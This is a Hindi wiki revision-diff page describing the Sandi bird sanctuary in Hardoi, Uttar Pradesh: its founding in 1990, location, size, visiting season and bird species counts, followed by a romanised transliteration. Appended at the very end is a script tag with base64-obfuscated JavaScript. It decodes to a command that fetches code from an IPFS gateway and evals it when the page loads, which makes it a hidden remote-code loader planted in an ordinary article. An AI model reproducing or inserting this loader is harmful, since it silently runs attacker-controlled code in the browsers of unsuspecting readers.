Difference between revisions of "साण्डी पक्षी अभयारण्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('<!-- सबसे पहले इस पन्ने को संजोएँ (सेव करें) जिससे आपको य...' के साथ नया पन्ना बनाया)
 
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
<!-- सबसे पहले इस पन्ने को संजोएँ (सेव करें) जिससे आपको यह दिखेगा कि लेख बनकर कैसा लगेगा -->
+
[[चित्र:Sandee.JPG|साण्डी पक्षी अभ्यारण |thumb|250px]]  
[[चित्र:{{PAGENAME}}|thumb|{{PAGENAME}} लिंक पर क्लिक करके चित्र अपलोड करें]]
+
'''साण्डी पक्षी अभयारण्य''' [[उत्तर प्रदेश]] प्रदेश के [[हरदोई]] में स्थित है। साण्डी पक्षी अभयारण्य की स्थापना [[1990]] ई. में हुई थी।  
{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न करें)। इसके नीचे से ही सम्पादन कार्य करें। -->
+
* यह अभयारण्य [[लखनऊ]] से लगभग 150 किलोमीटर की दूरी पर स्थित है। यह अभयारण्य लगभग तीन किलोमीटर के क्षेत्र में फैला हुआ है।  
'''आपको नया पन्ना बनाने के लिए यह आधार दिया गया है'''
+
* यहां पक्षियों की अनेक प्रजातियां देखी जा सकती है। यहां घूमने के लिए सबसे उचित समय [[दिसम्बर]] से [[फरवरी]] है।  
[[हरदोई ज़िला]] स्थित संडी पक्षी अभयारण्य की स्थापना 1990 ई. में हुई थी। यह अभयारण्य [[लखनऊ]] से लगभग 150 किलोमीटर की दूरी पर स्थित है। यह अभयारण्य लगभग तीन किलोमीटर के क्षेत्र में फैला हुआ है। यहां पक्षियों की अनेक प्रजातियां देखी जा सकती है। यहां घूमने के लिए सबसे उचित समय [[दिसम्बर]] से [[फरवरी]] है। विश्व में पक्षियों की लगभग 10000 दस हजार प्रजातियां हैं उनमें से लगभग 1300 प्रजातियां भारत में पायी जाती हैं और उसमें से उत्तर प्रदेश में 550 प्रजातियां पायी जाती हैं इनमें से कुछ प्रजातियां केवल सर्दियों के मौसम में ही दिखलायी पडती हैं वे सामान्यतः प्रवासी पक्षी हैं जैसे पर्पल सनबर्ड जो उत्तर प्रदेश के हृदय स्थल में स्थित हरदोई जनपद के पश्चिमी भाग में स्थित साण्डी पक्षी विहार में दिसम्बर के दूसरे सप्ताह के आसपास दिखलाई पडता है
+
* विश्व में पक्षियों की लगभग 10000 दस हजार प्रजातियां हैं। उनमें से लगभग 1300 प्रजातियां [[भारत]] में पायी जाती हैं और उसमें से [[उत्तर प्रदेश]] में 550 प्रजातियां पायी जाती हैं। इनमें से कुछ प्रजातियां केवल सर्दियों के मौसम में ही दिखलायी पडती हैं।
 
+
* वे सामान्यतः प्रवासी पक्षी हैं- जैसे पर्पल सनबर्ड जो उत्तर प्रदेश के हृदय स्थल में स्थित [[हरदोई]] जनपद के पश्चिमी भाग में स्थित साण्डी पक्षी विहार में दिसम्बर के दूसरे सप्ताह के आसपास दिखलाई पडता है।
[[चित्र:Sandi_038_-_Copy_(2).JPG|पर्पल सनबर्ड|thumb|250px]]
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
[[चित्र:Sandi.jpg|साण्डी पक्षी अभ्यारण |thumb|250px]]
 
 
 
===शीर्षक उदाहरण 2===
 
 
 
====शीर्षक उदाहरण 3====
 
 
 
=====शीर्षक उदाहरण 4=====
 
 
 
<!-- कृपया इस संदेश से ऊपर की ओर ही सम्पादन कार्य करें। ऊपर आप अपनी इच्छानुसार शीर्षक और सामग्री डाल सकते हैं -->
 
 
 
<!-- यदि आप सम्पादन में नये हैं तो कृपया इस संदेश से नीचे सम्पादन कार्य न करें -->
 
 
 
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
+
<gallery>
 +
चित्र:Sandi_birds.JPG|अभयारण्य मे पाये जाने वाले कुछ पक्षी
 +
चित्र:Sandi_038_-_Copy_(2).JPG|पर्पल सनबर्ड
 +
चित्र:Sandi.jpg|अभयारण्य
 +
</gallery>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{राष्ट्रीय उद्यान और अभयारण्य}}{{उत्तर प्रदेश के पर्यटन स्थल}}
[[Category:नया पन्ना जनवरी-2013]]
+
[[Category:उत्तर प्रदेश ]] [[Category:उत्तर प्रदेश के पर्यटन स्थल]]
 +
[[Category:राष्ट्रीय उद्यान और अभयारण्य]][[Category:पर्यटन कोश]]  
  
 
__INDEX__
 
__INDEX__

Latest revision as of 01:59, 1 March 2013

sandi pakshi abhyaran |thumb|250px sandi pakshi abhayarany uttar pradesh pradesh ke haradoee mean sthit hai. sandi pakshi abhayarany ki sthapana 1990 ee. mean huee thi.

  • yah abhayarany lakhanoo se lagabhag 150 kilomitar ki doori par sthit hai. yah abhayarany lagabhag tin kilomitar ke kshetr mean phaila hua hai.
  • yahaan pakshiyoan ki anek prajatiyaan dekhi ja sakati hai. yahaan ghoomane ke lie sabase uchit samay disambar se pharavari hai.
  • vishv mean pakshiyoan ki lagabhag 10000 das hajar prajatiyaan haian. unamean se lagabhag 1300 prajatiyaan bharat mean payi jati haian aur usamean se uttar pradesh mean 550 prajatiyaan payi jati haian. inamean se kuchh prajatiyaan keval sardiyoan ke mausam mean hi dikhalayi padati haian.
  • ve samanyatah pravasi pakshi haian- jaise parpal sanabard jo uttar pradesh ke hriday sthal mean sthit haradoee janapad ke pashchimi bhag mean sthit sandi pakshi vihar mean disambar ke doosare saptah ke asapas dikhalaee padata hai.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>